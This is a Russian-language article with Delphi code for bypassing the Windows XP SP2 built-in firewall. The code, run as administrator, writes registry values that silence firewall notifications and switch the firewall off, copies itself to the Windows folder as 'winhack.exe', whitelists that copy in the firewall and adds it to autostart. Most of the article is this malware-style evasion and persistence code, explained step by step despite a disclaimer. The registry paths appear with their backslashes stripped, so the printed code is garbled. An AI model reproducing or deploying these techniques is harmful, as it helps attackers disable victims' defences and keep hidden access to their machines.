СтатьиПрограммированиеDelphi

Обход брандмауэра Windows XP SP2

Автор: Blacksus

Внимание! Данная статья никак не направлена на побуждение деструктивных действий, а лишь демонстрирует незащищенность встроенного брандмауэра операционной системы Windows XP.

В этой статье будет описана попытка провести программу через встроенный брандмауэр, путем самокопирования. Сразу оговорюсь, что программа запускается с правами администратора. На конкретном примере вы увидите, как небольшое манипулирование реестром системы поможет не только прописать программу в исключения, но и отключить брандмауэр, и дальнейшее оповещение пользователя о попытках программ выйти в интернет.

Итак, весь код нашего примера будет написан на языке Delphi, но это не принципиально, его можно легко переделать на любой другой язык программирования.

Начнем с процедур, которые понадобятся в основном коде.

Процедура сохранения ключа, типа DWORD, в реестр:

procedure saveDWORD(Hkey: hkey; path, key: string; valueforkey: integer); var Reg: TRegistry; begin Reg := TRegistry.Create; try Reg.RootKey := Hkey; if not Reg.OpenKey(path, False) then begin Reg.CreateKey(path); if not Reg.OpenKey(path, False) then ShowMessage('Ошибка при открытии создаваемого ключа. Возможно вы не имеете прав на изменение ключей реестра.') else Reg.WriteInteger(key, valueforkey); end else Reg.WriteInteger(key, valueforkey); except end; Reg.Free; end;

Процедура сохранения строки в реестр:

procedure Tform1.saveSTR(Hkey: hkey; path, key, valueforkey: string); var Reg: TRegistry; begin Reg := TRegistry.Create; try Reg.RootKey := Hkey; if not Reg.OpenKey(path, False) then begin Reg.CreateKey(path); if not Reg.OpenKey(path, False) then ShowMessage('Ошибка при открытии создаваемого ключа. Возможно вы не имеете прав на изменение ключей реестра.') else Reg.WriteString(key, valueforkey); end else Reg.WriteString(key, valueforkey); except end; Reg.Free; end;

Процедура проверки существования ключа в реестре:

function valueexist(Hkey: hkey; path, key: string): bool; var Reg: TRegistry; begin Reg := TRegistry.Create; try Reg.RootKey := Hkey; Reg.OpenKey(Path, False); valueexist := Reg.ValueExists(key); except valueexist := false; end; Reg.Free; end;

Далее идет код процедуры обхода брандмауэра:

procedure TForm1.FormCreate(Sender: TObject); var Name, ExeAppName, ExeDir: string; begin ExeAppName := Application.ExeName; ExeDir := ExtractFileDir(ExeAppName); //Отключение оповещения пользователя if ValueExist(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile', 'DisableNotifications') then SaveDWORD(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile', 'DisableNotifications',1); if ValueExist(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet002ServicesSharedAccessParametersFirewallPolicyStandardProfile', 'DisableNotifications') then SaveDWORD(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet002ServicesSharedAccessParametersFirewallPolicyStandardProfile', 'DisableNotifications',1); if ValueExist(HKEY_LOCAL_MACHINE, 'SYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfile', 'DisableNotifications') then SaveDWORD(HKEY_LOCAL_MACHINE, 'SYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfile', 'DisableNotifications',1); //Отключение брандмауэра if ValueExist(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet001ServicesSharedAccess ParametersFirewallPolicyStandardProfile', 'EnableFirewall') then SaveDWORD(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile', 'EnableFirewall',0); if ValueExist(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet002ServicesSharedAccessParametersFirewallPolicyStandardProfile', 'EnableFirewall') then SaveDWORD(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet002ServicesSharedAccessParametersFirewallPolicyStandardProfile', 'EnableFirewall',0); if ValueExist(HKEY_LOCAL_MACHINE, 'SYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfile', 'EnableFirewall') then SaveDWORD(HKEY_LOCAL_MACHINE, 'SYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfile', 'EnableFirewall',0); //Копирование файла в системную папку и добавление его в исключения брандмауэра с правами доступа в любую сеть Name := Copy(ExtractFileName(ExeAppName), 1, Length(ExtractFileName(ExeAppName)) - 4); if WindowsCopyFile(ExeAppName,'c:windowswinhack.exe') then begin if not ValueExist(HKEY_LOCAL_MACHINE, 'SYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList', 'c:windowswinhack.exe') then SaveSTR(HKEY_LOCAL_MACHINE, 'SYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileauthorizedApplicationsList', 'c:windowswinhack.exe', 'c:windowswinhack.exe' + ':*:enabled:WindowsHack'); if not ValueExist(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileauthorizedApplicationsList', 'c:windowswinhack.exe') then SaveSTR(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileauthorizedApplicationsList', 'c:windowswinhack.exe', 'c:windowswinhack.exe' + ':*:enabled:WindowsHack'); if not ValueExist(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet002ServicesSharedAccessParametersFirewallPolicyStandardProfileauthorizedApplicationsList', 'c:windowswinhack.exe') then SaveSTR(HKEY_LOCAL_MACHINE, 'SYSTEMControlSet002ServicesSharedAccessParametersFirewallPolicyStandardProfileauthorizedApplicationsList', 'c:windowswinhack.exe', 'c:windowswinhack.exe' + ':*:enabled:WindowsHack'); //Добавление копии файла в автозапуск if not ValueExist(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionRun','winhack') then SaveSTR(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionRun', 'winhack', 'c:windowswinhack.exe'); end; end;

Здесь представлен не весь код программы, а его основа, но этого хватит, чтобы понять сам механизм обхода.

Теперь начнем разбор по шагам. Сначала программа с помощью ключей реестра отключает оповещение пользователя и брандмауэр. При этом брандмауэр среагирует, и на рабочем столе пользователя появится окошечко с вопросом о блокировании программы. Допустим, пользователь умный, и нажмет кнопку «Блокировать». Конечно, сама программа после этого доступ в интернет не получит, но, далее идет процедура WindowsCopyFile которая скопирует программу в папку Windows. Затем идет прописывание этой копии в исключения брандмауэра, тоже через реестр. И завершающий этап, прописывание копии в автозапуск.

После всего этого мы получим систему с отключенным брандмауэром, отключенным оповещением, и программой, которая может выходить в сеть, даже если брандмауэр включен.